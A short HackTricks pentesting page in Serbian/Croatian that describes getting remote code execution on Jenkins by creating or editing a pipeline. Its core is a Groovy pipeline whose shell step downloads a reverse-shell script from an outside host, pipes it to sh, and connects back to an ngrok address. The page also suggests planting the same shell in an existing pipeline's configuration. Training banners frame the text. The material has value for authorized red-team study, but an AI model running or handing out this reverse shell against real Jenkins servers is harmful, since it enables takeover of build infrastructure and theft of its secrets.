Jenkins RCE Kreiranje/Modifikovanje Pipelines

Reading time: 2 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Kreiranje novog Pipelines

U "New Item" (dostupno na /view/all/newJob) izaberite Pipeline:

U Pipeline sekciji napišite reverse shell:

groovy
pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Na kraju kliknite na Save, i Build Now i pipeline će biti izvršen:

Modifikovanje Pipeline-a

Ako možete pristupiti konfiguracionom fajlu nekog konfigurisanog pipeline-a, možete jednostavno modifikovati dodajući svoj reverzni shell i zatim ga izvršiti ili čekati da bude izvršen.

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks